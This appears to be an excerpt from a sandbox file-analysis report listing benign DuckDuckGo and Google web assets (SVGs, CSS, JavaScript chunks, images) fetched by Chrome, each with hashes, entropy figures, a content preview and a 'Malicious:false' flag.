                                                                                                                                                            SHA-256:082A8B1BC16816B2EE1A57A95786216F499FA5ED00CC96F404EFED5C4E4E34C0
                                                                                                                                                            SHA-512:A30D28F002EBE190BC9DB5FF141571C482D5C71A46FB0861D6706A2D96B2F0A0811FD35A976D7E0B70F9DAF3F1471A5D6029B4D4BC71E4EA5CDD85A1346390DC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-fg-dark-sm.svg
                                                                                                                                                            Preview:<svg width="375" height="359" viewBox="0 0 375 359" fill="none" xmlns="http://www.w3.org/2000/svg">.<mask id="mask0_2_7151" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="0" y="0" width="373" height="346">.<rect width="372.627" height="345.597" fill="#C4C4C4"/>.</mask>.<g mask="url(#mask0_2_7151)">.<path opacity="0.5" fill-rule="evenodd" clip-rule="evenodd" d="M158.555 227.495L181.644 259.69H183.43V249.57H197.605V216.457H205.705V199.9L221.909 188.858V205.419H227.984V249.57H240.135V236.327H258.36V208.178L266.464 202.659L274.564 208.178V230.254H278.614V186.098L302.915 202.659V214.347H313.04V174.574L321.144 169.055L329.244 174.574V229.445H335.319V212.67H357.595V238.532H361.645V197.69H367.72V179.476H374.608L385.949 164.022L397.29 179.476H404.175V197.69H410.25V213.697H416.325V186.098L424.425 180.579L432.526 186.098V213.697H436.579V253.986H444.679V213.697H448.729L458.855 199.9L468.98 213.697H473.03V241.292H485.181V197.136L501.384 208.178V221.976H509.485V241.292L519.61 227.495L542.698
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (3274), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):3274
                                                                                                                                                            Entropy (8bit):5.396768830240146
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:mtTBrcIGsrcIGsbsows15Tws15PCZUxzVKLEJEco7+beALHZSEHA5bJywqlEHUGw:mtOTKb1db1ZlNY5co7sRxiU0rqig7OW
                                                                                                                                                            MD5:B2B2EE789DBFB6C86F4B38F62962A8B8
                                                                                                                                                            SHA1:853CF2DE3F62384B67157E3011284DC6B7E304DA
                                                                                                                                                            SHA-256:96ACE1BA84E9CD8F75963C517CE30151907E51C56F3890F4152E722FE88B3C9E
                                                                                                                                                            SHA-512:DEDEBDD29F5059BC61C7E82E5A1F5FEE316B21787E7628F9ABEADDBD7D595B8B67181B4DDC3520236355A3C908E8D579DAF89502A426E3E26178EFE2B58B82AE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.fSHv1dvvroY.L.W.O/m=qcwid/excm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/ct=zgms/rs=AA2YrTsVA9_hKyGtH1-UzkVaxmvYQjNv7Q"
                                                                                                                                                            Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_F .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_F .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_F .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (12604), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):12604
                                                                                                                                                            Entropy (8bit):5.165761739519277
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:hyIhz2J6M7yapujiDF3/3g4Wup7kp5p+R2p/pU:hBhKT
                                                                                                                                                            MD5:86BFECA5CF1BE59A0036B2F7668779F9
                                                                                                                                                            SHA1:7CF2BB44E6918E85D96092977A5249D075F7E83A
                                                                                                                                                            SHA-256:E60DA557A4CD72AF8CAC11A49DE1DE9B83857ABB7536207FAB20D15E45C55CB0
                                                                                                                                                            SHA-512:21A58B0277B241C4C92EA7BB730401C145F5FDCE30260E9CF0725B7F806C38D255E7988232D5DF25CF2174F9CC1CC6960E3401F452FD4072B682BBBE88ED05C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/css/9cf77fa71faeba25.css
                                                                                                                                                            Preview:.automaticDownload_downloadFrame___qdi7{height:0;position:absolute;visibility:hidden;width:0}.automaticDownload_downloadLink__EGyQu,.automaticDownload_downloadText__2rF84{display:inline}.card_card__afbUo{padding:var(--sp-4)}.card_card__afbUo.card_dismissable__j5ZTy{position:relative}.card_card__afbUo.card_elevation0__xXwlZ{box-shadow:var(--elevation-0)}.card_card__afbUo.card_elevation10__yLHWL{box-shadow:var(--elevation-10)}.card_card__afbUo.card_elevation30__5xXhJ{box-shadow:var(--elevation-30)}.card_card__afbUo.card_elevation50__HbWMO{box-shadow:var(--elevation-50)}.card_card__afbUo.card_elevation70__ykziN{box-shadow:var(--elevation-70)}.card_card__afbUo.card_elevation90__03AWT{box-shadow:var(--elevation-90)}.card_card__afbUo.card_radiusSm__tuD5b{border-radius:var(--border-radius-sm)}.card_card__afbUo.card_radiusMd__NotZS{border-radius:var(--border-radius-base)}.card_card__afbUo.card_radiusLg__kWADP{border-radius:calc(16*var(--px-in-rem))}.card_dismiss__fg_Fp{box-sizing:content-box;d
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 720 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57621
                                                                                                                                                            Entropy (8bit):7.9521696353685725
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:XGl1ASeHHyeQhv7Cc4FQdikWqVPe14rmpq18jHusl6gpebDwRhc9HPuwzXT60wBp:27ASiyVlzxV8qrgLc9Hxj6kry3
                                                                                                                                                            MD5:574871BE4B5C92EF0461DAAE0789B4E7
                                                                                                                                                            SHA1:C51501309FB6B33C8F605DD59C6FAD4F58ACD731
                                                                                                                                                            SHA-256:B2C195A170D953446BCDAEB64B686069A2E95CBCB0DE8640FB11CF87C7FB6A26
                                                                                                                                                            SHA-512:AEB036D40BB7FC1BF422B5A82955365DA4E7E5F8DBF33C0563F7CEDE41FD63EA9CE5FA4F8A7166E90D216EF7160B2F6A8953F9BEE464B89946C261C6118CD84E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR.............#\......PLTE............................................................~..............}.....|.....{..}...........{..}..{..{..{..{..{.....{..{..{..{.........{..{..}.............|..{..{..{.......{....|....{...........|....|..{..|.........~..~.....|....~..~......~..|..............}..~.............................}..............................~................................................................................................................................................................................}......................................................................~...................................................................................k.......tRNS...........!4.$.*WSN..'-80.;.F".BJ?&.049,).=AEI...Y].....qLad..U.h.P....k.uR|..@..$x....n..-..1(.K...6..&"+.]......98H.3...QV.k.}F...;.W.E.B/k..v.q.....\...q.P.l...?..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 866 x 565, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34303
                                                                                                                                                            Entropy (8bit):7.977567147939618
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:d0c2njnh8tFUyLFpPU0GamXASajmXtV+hU2YbAG6kPOEWkXPRjK:B2njn61LvVVN/WOrmw
                                                                                                                                                            MD5:ED5AC3C5F537DE70AE3CF64A391C274E
                                                                                                                                                            SHA1:1C854A5885A7602B7D2052FC9CE932CEE7E6BED8
                                                                                                                                                            SHA-256:1378964BFEF8AAA51321B8A8E3184FBF2E330A64DD1AB703DF90A97A8980A6A5
                                                                                                                                                            SHA-512:306A2695A0A5CBBC05672C83D2E3B983561A8D026B67787925E1A31876589181728358E1176F10826C38E4A0A5584871DACCAA4E38DDFC3A60DB5F2721D6593B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...b...5........[....PLTE&&&..................................................................w......../......3i.5@.F....x...........Y...C54.R>.....h.....^.P...Q.KKK.......W.G......p....V..J...>.A..C..L...#.R...,.....5.....I..w.......................{...........?r...@..F......@........d...<G\z..Q[^^^...'...../U.............u.........C.... Iz!!!...q..............@..Nl.>>>xxx....EP.....#....Y...........^f..Z.......eq---....RR...kkkc.....<.l9z....................x5........?`..ml.UH..;. .r....y....}.............n.......H.f'.>'.........U5.....qV.~..._..^.......G|....e..;..1.........uV.p.....^..U(...E.....h2..U.z..>.#.G.#1.....K#..^.8.n8..n.>../u^.,j.7....tRNS....."1*-...}uOA..ha..a....IDATx..............................=..m......./}...S...j[.........p.3..........@f...N.C+dhF@.QS..l@.E...R.2....T.s..b.$L.....49.a..'.......m.lX}.Y..FA...t........T...:..h..h..V5edX.......}.6'F...rw;._.m....7.o.......U.a.KX...2..._B....yR...rJ.(G.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (62723), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):62723
                                                                                                                                                            Entropy (8bit):5.9041522883656326
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:KtGMJyOoFWkYNS4qb8+Pxjf3keYUQrVyHCgQELCXcudnrH5Is+AWPB1xds:gM6N88ITpYUSVNrHqtAkxds
                                                                                                                                                            MD5:5CBC2272676A2E53CB45C44F986CB7C7
                                                                                                                                                            SHA1:3ED92D73E8B26502664D8C608BEF74F2424124AA
                                                                                                                                                            SHA-256:F13F5690B5F05DDAA88C154253B554B56858F53D966F46C4E40F9A4FF2C09E26
                                                                                                                                                            SHA-512:B70028BF6D52DF2A2E4A2468116C86E22D60642738C4C371DC4BFFB55971D3557F4BA74C7AAD55DA1F51EF2668FA0BFA18CFAD55311E007F66CCD350763C849A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/69706-4c02de239da444ff.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[69706],{39040:function(M,N,e){"use strict";e.r(N),e.d(N,{__N_SSG:function(){return JM},default:function(){return qM},head:function(){return XM},seo:function(){return KM}});var j=e(59499),D=e(17674),i=e(9008),I=e.n(i),g=e(67294),z=e(16682),o=e(11251),n=e(18999),u=e(87188),c=e(97637);var a=e(29277),t=e(85194),s=e(77646),T=e(32634),r=e(94184),A=e.n(r),l=e(86896),y=e(91515),O=e(51420),L=e(85893);function x(M){var N=M.children,e=(0,n.nO)();return(0,L.jsxs)(L.Fragment,{children:[(0,L.jsxs)(I(),{children:[(0,L.jsx)("link",{rel:"preconnect",href:(0,O.qQ)("countryCode")}),(0,L.jsx)("link",{rel:"preload",href:(0,O.qQ)("countryCode"),as:"fetch",fetchPriority:"high"})]}),N({country:e})]})}var d=e(65367),Q=e(27628),S=e(90372),k=e(89447),U=e(44820),Y=e(67499),m=e(30178),w=e(44012),C=e(76029),E=e(9868),b=e.n(E);function h(M){var N=M.className,e=M.fallback,i=M.dismissable,I=void 0!==i&&i,g=M.isMobileDevice,z=void 0!==g&&g,o=(0,n.Nd)(),u=(0,n._)(
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (28108), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):28108
                                                                                                                                                            Entropy (8bit):5.254610114752334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:DtYQoBQsMRh82cV8mgFzqEBMkcw5/65G69G5mYkziLph12uGgAR+weAgj7nz7+I9:aIqgMkV2uGgA4x
                                                                                                                                                            MD5:D4F896519FE238ACA4E76DFD1ED114EF
                                                                                                                                                            SHA1:206458D2C6FCA766A0F4F395CBDA9BD7F24C9D1A
                                                                                                                                                            SHA-256:D6F9A9B49C1955D15EF38C114D82A3FE4F02E8FB5032901F0CC77F9482D8D3D9
                                                                                                                                                            SHA-512:EC95FDB003F49BE7ADF5FEE5F57CBAFB12F902C3995220F722E4574A5E3B011EA28FFB9FF274F9083B3DC9611EEFB975B6577698C5758DD7CFD448AC4809DB56
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/css/df680b227823b9ab.css
                                                                                                                                                            Preview:.center_root__Uf1xM{box-sizing:content-box;max-width:100%;margin-left:auto;margin-right:auto;padding-left:var(--center-gutter);padding-right:var(--center-gutter)}@supports(max-inline-size:var(--center-measure )){.center_root__Uf1xM{max-width:var(--center-measure);max-inline-size:var(--center-measure)}}@supports(margin-inline:auto){.center_root__Uf1xM{margin-left:0;margin-right:0;margin-inline:auto}}@supports(padding-inline-start:var(--center-gutter )) and (padding-inline-end:var(--center-gutter )){.center_root__Uf1xM{padding-left:0;padding-right:0;padding-inline-start:var(--center-gutter);padding-inline-end:var(--center-gutter)}}.center_andText__ejUnC{text-align:center}.center_intrinsic__mk_Ab{display:flex;flex-direction:column;align-items:center}.center_gutters__Ot5Wk{--center-gutter:var(--sp-4)}.content_root__qJU3r{padding-left:var(--sp-3);padding-right:var(--sp-3)}@media screen and (min-width:640px){.content_root__qJU3r{padding-left:0;padding-right:0}}.footer_footer__U4rpQ{color:var
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 640 x 422, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):87313
                                                                                                                                                            Entropy (8bit):7.961155181906711
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:MBNQN8uVwEEGyKUmH32ngKjs1MU9K+CFYvAbQwoSTSGWFkmnkb/lbS:MB6NneRGyK9HnMUgDbD0KvU
                                                                                                                                                            MD5:CFFE0FD094BF9A145DC8A90A3100B161
                                                                                                                                                            SHA1:C7EA6D0A5BF40595796CBF9015A2263357D144CA
                                                                                                                                                            SHA-256:E5B03FF89AF73B113D13C7A6C7C47ECE838B4EA7D9FEED2FF8FA740CCC1C51F6
                                                                                                                                                            SHA-512:B1F482FFEAA0A0B0DFD52E1503CB2357424BE4CCF0EF752EEF744704B4FF13B324C5B74C93BE1C99CD7B46514F28ED03C354A87E79CB0D3BA101A1F1089FF6A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...............5.....pHYs...%...%.IR$.....sRGB.........gAMA......a...T.IDATx.....mWY..1.N.y.lB...r|..BI..<.0A.]..h..P.i..<..=Z... ...Wm...`.{.AKK.XZ`k@I.V........M..<v....k......}.s.1.Z{...{...6..k.>...>f...YJ".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$.;.........xN...w...\7.a[....2~_[>w.....7.o.5...}=v...../..H...}.Xn..#.t\.7,;l.X...+..q..7..ec0.........M.c.nY.n4.....?.|...?..?..:.~...9..O\.ZE...>\3.9\$.?N..........+7..X8gp...Xv_.....q.7<.lr....X...:.......=..~.............F.g..n.{..Z..._.p..T....B;..al.,mG....b>..........H.8.?6..F>e.c...~.y.=.F..i.z7Z..0........>F.............s.#.{.F.2.c5.em..k...5..Y....=.[..<...%.P..".\{....o076..8&....
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 500x434, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5836
                                                                                                                                                            Entropy (8bit):7.297515748907693
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:6SE0GxqLVMf7UEKhbpvxqBTfhmM7L9OIjFIkTPYL4qaa92K+Tz+FS:6Sf/LOf7kwmTCFZTPEaa92K+31
                                                                                                                                                            MD5:D4C3993EF0D9ED04682761285CBF27B3
                                                                                                                                                            SHA1:00E573D9537ECA4CE317979208903FDD783A32B6
                                                                                                                                                            SHA-256:E2C2CBC53E41377DADDA30B14FEE63A9168879628AAC3525AFF20BA82139FCCA
                                                                                                                                                            SHA-512:4CA59CA8ACC78638281CBB30ECE25C108B73D458D84ED3AB73274A2042E19F906DC22ACBF6921A2F1AC803FFC9EA178817E4233A594B470AB33116EB91EEE2A4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-bg-md-lg.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........................................................................................[...,..(...R....,. .".dIdE.6K.,........Evg..@,.."(.P.BPT.......\..,.K.Q.dED..(...(.vz..@* T....P..%...). .3,.Fe..d."...(@...Pu.8...AP QB......@*.....K%..r.9.dID......T'_.... E. P(DZ)(AJP...!%D\...6K%.%..A`.... .A....J.Aa@*...R. ..HIQ%.Is:.%.$.Q ..!P........J......AA@JT....$.K.s,.1%..Id..*@. . ..W....A(.(....(*P..($.Ia%..\.9.$.Y.P .(.R......@.`E@.@.T...(B...X"K".e..s.K%..BQ.@..@.R(.>.0DTR.@.X..... ....%..2.s,.%..d. .....E.+...*.P .. .*....(*......d..D..d.@@.P..."....1B.. ,...T..**...K.IdIr.Y..9.Q%.........tz8.(@*.. U%..XYA@D.%BXfY.e..'6J$........._.G..%..(.......@......2.s,.,.D.......XXQ..=.... ....(.AJ..@.!,$.\...d.....J.....[..c.(..P..(...Z...JI@...dfY,.,...R@.%...J.{..$....-B.T.......P..1%.g(.....TR-....A^....Z@Q...P......%..,.,.$
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 2360 x 1504, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):204887
                                                                                                                                                            Entropy (8bit):7.971580881211011
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:1t5xj7vQ03q8/kEfWMzzJrvlx8XjT5epql5bEPBu/:1bV7403qhEeGFLlx8Xj9yql5bEPBQ
                                                                                                                                                            MD5:BB5E516EE8D9BC7A0CA28A6663CA01DA
                                                                                                                                                            SHA1:172B7F523C2CFCE3481C5C387B057F8C7B1596D1
                                                                                                                                                            SHA-256:D4F7AE09B7C9D350E9A11200632FA8D334FE5BC6C0E15B919E385358F8D04CE4
                                                                                                                                                            SHA-512:839D0CF98C5B2C9A1D4E35A7AB5C2F8BCEA62B4564DA09FAF459087A36FF9C9A376DE198718A14D6EBC48EF1AAEB9C437BC8B1E6CE1CF6FAB60FD18CA605DAB5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...8.........H@DL....PLTE..........................................g.b...............rq..........................................JJJ..."""...fffOOOEEE)))......AAAzzz'&&.W4...>>>777___VVV$$$...vuu,,,..."..ZZZ///...212! .rqq..~.........nmmSSS......544<;;........jjj999.........;-.......UD$...YH'...@0....(........F%................/$.......4*.ccc?'.P?!...L'....3&.,!.......$........S+....e9.8"..........I@.T3.L/.E+....5..J:....]1....B7.G3.;0....RH.[9.oA.XO.`L*?.................O8.wo............;mf.t7...qj.zK.Z>....9i.bA.eG.}v...sP \T.|.e]..A.|Y...aX.ia..^Z..K.oU2+....<.H...iQ...YXI6...Y".qEtZ6.d=..oO@-......bRA.}J.Z.e>.e0...@6(.[..h$......b.rTqbJ..p.8.L.;..k.z._..................k5.6.......{l..`....v)....*..8.Pz.q.......t`v....<U...x.4...t,(....tRNS........." .$.........O...r..z....IDATx.........................................................................`..h.A..........l.LLk.Xgl.d....bz"""""""""""""""""".p2....F.g...._...U.......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (23654), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):23654
                                                                                                                                                            Entropy (8bit):5.337934006446474
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:wihuT6ilSV8rrlH2gKXb2xducG2IuL3+C/ySLbLizT2W5hkPEw1vooTkkksk:z8aX6T3+tuOVhkPukzk
                                                                                                                                                            MD5:4C2AF44948F3D51F3BD3BE2146630F82
                                                                                                                                                            SHA1:9FF33410B7E39866B12ECA954B62F0ABE6A6B627
                                                                                                                                                            SHA-256:C542A46C4A65F14262D7A21AB24EDC5F4E94DCBB9E855F01E9E45DEA5A939DF5
                                                                                                                                                            SHA-512:FD31C5E54342BFD8BD7CE07EA81718A0507DC9A9F4507F60B2AE69CF4D0A1EA3A21AF4B981BA43E4DADFF199903C10E08F081A82FF1165E4E895E341591F83B2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/49224-2de3d7ae3b973557.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49224],{765:function(e,n,t){"use strict";t.d(n,{M:function(){return c}});var r=t(67294),o=t(96637),a=!1,i=0,u=function(){return++i};function c(e){var n=e||(a?u():null),t=(0,r.useState)(n),i=t[0],c=t[1];return(0,o.L)((function(){null===i&&c(u())}),[]),(0,r.useEffect)((function(){!1===a&&(a=!0)}),[]),null!=i?String(i):void 0}},73262:function(e,n,t){"use strict";t.d(n,{Gk:function(){return ie},Lv:function(){return ce},O2:function(){return ue},SF:function(){return ae},gA:function(){return oe},h3:function(){return ve},hQ:function(){return re}});var r=t(67294),o=t(96637),a=t(45558),i=t(85777),u=t(94411),c=t(69695),l=t(40884),s=t(61331),f=t(13026),d=t(12837),v=t(24683),p=t(28274),h=t(765),g=t(44270);function b(e,n){if(null==e)return{};var t,r,o={},a=Object.keys(e);for(r=0;r<a.length;r++)t=a[r],n.indexOf(t)>=0||(o[t]=e[t]);return o}function E(){return E=Object.assign||function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (356), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):356
                                                                                                                                                            Entropy (8bit):5.38518134584861
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:XzjbdHhjbzrcv8FxkvV+3rWG9ZXY1tMiLmpgFDNInI9QeQdQH5JtTBRXyYDUXTcm:fbjcv8FxAU79StmsaI9QfQ3tTBRXyYYH
                                                                                                                                                            MD5:3905C5DEC47049C0E9C0414B3883FF73
                                                                                                                                                            SHA1:7CCBC28A9386C83DFD749F7B00DE16F3FA98F60A
                                                                                                                                                            SHA-256:054275CD5B32584CA42E62CF5DB129ED955A95B5B88B75FF4BF7D5F46680E921
                                                                                                                                                            SHA-512:97E375B28E05B78E7FBB05B73F741BD472462D2300E53F8EEB06F8686BF3371006884E998593536970D7F84326DD5B735FDF01065A103DD2ECEA8CC9F85E9242
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/pages/%5Blocale%5D-a03851f118d21af9.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6513],{53124:function(n,_,u){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[locale]",function(){return u(39040)}])}},function(n){n.O(0,[41966,43965,49224,81125,53343,36926,62242,49706,20581,84969,56987,4770,69706,49774,92888,40179],(function(){return _=53124,n(n.s=_);var _}));var _=n.O();_N_E=_}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 711 x 1123, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):47334
                                                                                                                                                            Entropy (8bit):7.95953901563727
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:5DHdjGRb7JcXY+bu9/qnAvyO4NJKWDLK7FFyb3WgA6elNUUMw2oBLjGmfKUuI:BdjGRbQdGSCyO4NJvDLo03WseDUdgCR4
                                                                                                                                                            MD5:BE16F2C911BFBF8690C7186E7E831444
                                                                                                                                                            SHA1:973C99C53B549AC4C5A0AD95D1AB00B91B517F80
                                                                                                                                                            SHA-256:45D5A5F4DC731206EBE200ACF3C5583D11424E16D792101E463743ED18A485EA
                                                                                                                                                            SHA-512:6F025D6FEA6022C496FA7DDA3D80A1A25D06DCD3DB71327DA4CCAE6CA0287CFC361620C9C43A757CCED5609838B6C951DEC60DE64FB1CF65DE75413441251D62
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png
                                                                                                                                                            Preview:.PNG........IHDR.......c......uy.....PLTE..."""............]]]............................................................III..................ggg...@@@........................................."""............9i...%!..>>>YYY..........w..........uuu.............C5000.........4.S...B................?.~ggg...LLL..........ttt@@@......8h........k....R|.8f..........Es....KKK.........7e.1Z........3............w..^....A....L\..........=N0.....=. .kt6c..x....9../..3\...@K.0 .(.....4`.......``` |......h..t.`.[NQ.....................e...qC......#..........W .Y.@......Zif.P.........}..%.....|..p......Y.@...g.....Lp.......g............i.....N.i...K......i..Dp.?f..ppp..I..>.........Z.tA.Y.R/X5.\..c0.sss.g[.KC..1......p..O.z.....oooM.iQ.G.}..`....Xz.........i&.........3tRNS...........%.*". (:=6D.3A-1.B.4.P.C!.....i.\...]%....qIDATx............................................f..v..a(.c....Z...i.S....'..}...U.K..!n\.$I.$I.$I...S...h7....rDG.Vo.u...]....E
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):4373
                                                                                                                                                            Entropy (8bit):4.3644123653715905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:vlv4qrvD3pW3U6LG75gTd8N5bPl6RfgTbrsqmFKcoCD0CRbdnazbZ:vqqHUk6LyOTWzbPI1gTbgq6Kc19dnyd
                                                                                                                                                            MD5:50E91E0FB7DB8C2F03F7EDDA252903F8
                                                                                                                                                            SHA1:446F456955C053AC654AFC87C322D2BA41A276B9
                                                                                                                                                            SHA-256:763C118F9265ED438E693ED67531554D71A030CB329B82D3CE0CF67BC4E6B19F
                                                                                                                                                            SHA-512:EB06763B0AB356E76A6E1C3AC26C094156959845692D623D535844C5B6D05DC3BA4C7E6178C5D45618980BC82EC85E14ED874127571C36DCD5F192CB94320231
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-fg-md-lg.svg
                                                                                                                                                            Preview:<svg width="1044" height="591" viewBox="0 -28 1044 535" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M964.162 419.052L996.067 462.701H1018.45V534.272L519.532 534.272H0.693359V448.982H20.2816V404.088H31.4749V381.641L53.8658 366.671V389.123H62.2607V448.982H79.0507V431.026H104.236V392.864L115.433 385.382L126.626 392.864V422.794H132.223V362.929L165.803 385.382V401.228H179.795V347.305L190.992 339.823L202.185 347.305V421.696H210.58V398.954H241.362V434.017H246.959V378.645H255.354V353.952H264.871L280.543 333L296.214 353.952H305.728V378.645H314.123V400.347H322.518V362.929L333.711 355.447L344.904 362.929V400.347H350.505V454.969H361.698V400.347H367.295L381.287 381.641L395.278 400.347H400.875V437.758H417.665V377.894L440.056 392.864V411.57H451.249V437.758L465.241 419.052L497.145 462.701H499.615V448.982H519.203V404.088H530.397V381.641L552.788 366.67V389.123H561.183V448.982H577.973V431.026H603.157V392.864L614.355 385.382L625.548 392.864V422.794H631.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
